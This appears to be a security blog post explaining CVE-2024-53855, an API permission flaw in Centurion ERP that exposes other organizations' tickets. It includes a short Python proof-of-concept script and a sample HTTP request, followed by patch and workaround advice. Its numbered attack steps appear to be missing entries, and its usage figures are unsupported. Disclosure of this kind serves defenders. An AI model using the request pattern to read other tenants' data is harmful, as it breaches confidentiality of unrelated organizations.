In June 2024, a security vulnerability was found in Centurion ERP, a popular open-source IT management tool focused on IT Service Management (ITSM) modules. This issue, now tracked as CVE-2024-53855, permits authenticated users with specific ticket view permissions to access ticket data belonging to organizations they aren’t part of—but only through the API. The main user interface (UI) remains unaffected. This post breaks down what the vulnerability is, how it works, sample exploitation, and what you should do about it.
What is Centurion ERP?
Centurion ERP (GitHub) is used to manage IT services, tickets, change requests, incidents, and more. Millions of support desks and IT teams use it for ITSM. The project emphasizes open source accessibility and modular management.
What is CVE-2024-53855?
The vulnerability lets an authenticated user—with the right permission—to read tickets from other organizations (not their own) by directly querying the API endpoints. UI controls do block this, but underlying API checks are faulty or missing.
Why is this a Problem?
Organizations store sensitive support tickets, incident data, and change management info. If your user base shares a Centurion ERP instance, anyone with the proper API access and one of those four permissions could see private tickets from every other org. This could include confidential issues, personal data, or security incidents.
Attacker guesses or discovers IDs or organization IDs for tickets in Org B or Org C.
4. Attacker sends a GET request to the vulnerable API endpoint (e.g., /api/tickets/change/12345).
5. Server returns ticket details, even though the attacker’s user session isn’t part of the corresponding organization.
Suppose we want to fetch change ticket data
import requests
API_TOKEN = "attacker_token_here" # Attacker's valid Centurion session token
TICKET_ID = "100234" # Ticket ID for another organization's ticket
headers = {
"Authorization": f"Bearer {API_TOKEN}",
"Content-Type": "application/json"
}
url = f"https://centurion.example.com/api/tickets/change/{TICKET_ID}";
response = requests.get(url, headers=headers)
if response.status_code == 200:
print("Leaked Ticket Data:")
print(response.json())
else:
print(f"Couldn't access ticket: {response.status_code}")
If permissions are present, this will print JSON data containing ticket information the attacker should not see.
HTTP Example
GET /api/tickets/change/100234 HTTP/1.1
Host: centurion.example.com
Authorization: Bearer attacker_token_here
HTTP/1.1 200 OK
Content-Type: application/json
{
"ticket_id": 100234,
"title": "Critical security update for payroll system",
"organization": "BigBankCorp",
"created_by": "jane.smith",
...
}
---
References
- Centurion ERP Official GitHub Releases
- NVD CVE-2024-53855 Entry *(pending publication)*
- Centurion ERP Security Advisory: Ticket API permissions bypass
Official Fix
The flaw is patched in version 1.3.1. The maintainers have added org-level authorization checks for each relevant API endpoint.
Upgrade to version 1.3.1 or later immediately:
Centurion ERP 1.3.1 Release Notes
Workarounds
- Remove view_ticket_* permissions from users not needing cross-organizational access. This, however, will block all ticket visibility for those users—including tickets they _should_ see.
- Restrict or monitor API access at the gateway/proxy level, if you’re unable to upgrade.
Note: There's no practical, granular way to patch the vulnerability outside of upgrading.
Conclusion
CVE-2024-53855 is a serious data exposure bug in Centurion ERP's API. Though it doesn't affect the main UI, API users can leak business-sensitive information across organizations. If your Centurion setup is multi-tenant or used by different orgs, upgrading is critical. Don’t rely on front-end restrictions alone—always keep your backend permissions up to date!
Want to learn more or report a related issue?
Check the Centurion ERP issue tracker on GitHub or reach out through their security contacts.
Timeline
Published on: 11/27/2024 19:15:33 UTC